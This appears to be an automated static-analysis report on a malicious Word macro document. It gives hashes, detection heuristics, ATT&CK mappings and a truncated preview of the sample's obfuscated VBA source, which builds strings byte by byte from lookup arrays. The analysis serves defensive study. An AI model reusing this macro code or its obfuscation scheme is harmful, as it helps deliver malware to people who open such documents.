Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 07a3355f81ff69a1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 115.5 KB
Created: 2018-09-24 11:06:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 92d66a5f165c57fe24e23dfe526da0bf
SHA-1: d1bcd9d1fe52715025740fca312a9782981f64d8
SHA-256: 07a3355f81ff69a197c792847d0783bfc336181d66d3a36e6b548d0dbd9f5a9a
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is a malicious Office (OLE) document containing VBA macros. The macros are obfuscated (the preview shows strings being assembled byte by byte from lookup arrays at runtime) but include calls to GetObject and CallByName, which suggests an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Valyria-9761059-0' further supports the verdict. The single embedded URL is a standard OOXML schema namespace reference; it is benign and likely a false positive.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-9761059-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • GetObject call [high] (OLE_VBA_GETOBJ)
    The macro code calls GetObject
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    The macro code calls CallByName
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40391 bytes
SHA-256: b728a984c32843f87c0e1f5b4454f954cdb5b1c06067569d4de30979a10ca826

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim let64, let99(2) As Byte, let35(9) As Byte, let60(32) As Byte, let55(19) As Byte, let86(13) As Byte, let11(6) As Byte, let27(55) As Byte, let72(1269) As Byte, let01(5) As Byte, let82(19) As Byte, let77(19) As Byte, let00(1 To 255) As Byte
Private Sub let97()
let77(1) = let00(65)
let77(4) = let00(65)
let77(17) = let00(51)
let77(16) = let00(55)
let77(15) = let00(68)
let77(2) = let00(52)
let77(11) = let00(56)
let77(5) = let00(55)
let77(3) = let00(49)
let77(8) = let00(55)
let77(14) = let00(66)
let77(10) = let00(57)
let77(12) = let00(52)
let77(9) = let00(65)
let77(19) = let00(51)
let77(0) = let00(51)
let77(13) = let00(66)
let77(18) = let00(70)
let77(7) = let00(57)
let77(6) = let00(55)
End Sub
Private Function let42()
Dim let34, let70, let06, let90() As Byte, let66, let31
let31 = 1
While let31 <= (-2483 + 2738)
let00(let31) = let31
let31 = let31 + 1
Wend
let97
let10
let66 = (6092 - 5836)
let89
While let70 = 0
let90 = CStr(let34)
let06 = let73(let90())
If let06 >= 1 Then
let11(2) = let90(0) + (let90(1) * let66)
If let06 >= 3 Then
let11(3) = let90(2) + (let90(3) * let66)
If let06 >= 5 Then
let11(4) = let90(4) + (let90(5) * let66)
If let06 >= 7 Then
let11(5) = let90(6) + (let90(7) * let66)
If let06 >= 9 Then
let11(6) = let90(8) + (let90(9) * let66)
End If
End If
End If
End If
End If
If let05(let02(let82(), let92(let11()), 19), let77, 19) = 1 Then
let70 = 162
End If
let34 = let34 + 1
Wend
If let70 = 162 Then
let09
Else
MsgBox let70
End If
End Function
Private Function let94(let03)
Dim let33(1) As Byte, let50, let40, let07
If let03 > (91545 / 359) Then
let50 = let1(let03, (-7012 + 7268))
let07 = let03 / (1588224 / 6204)
let40 = let07
Else
let50 = let03
End If
let33(0) = let50
let33(1) = let40
let94 = let33
End Function
Private Sub let04()
... (truncated)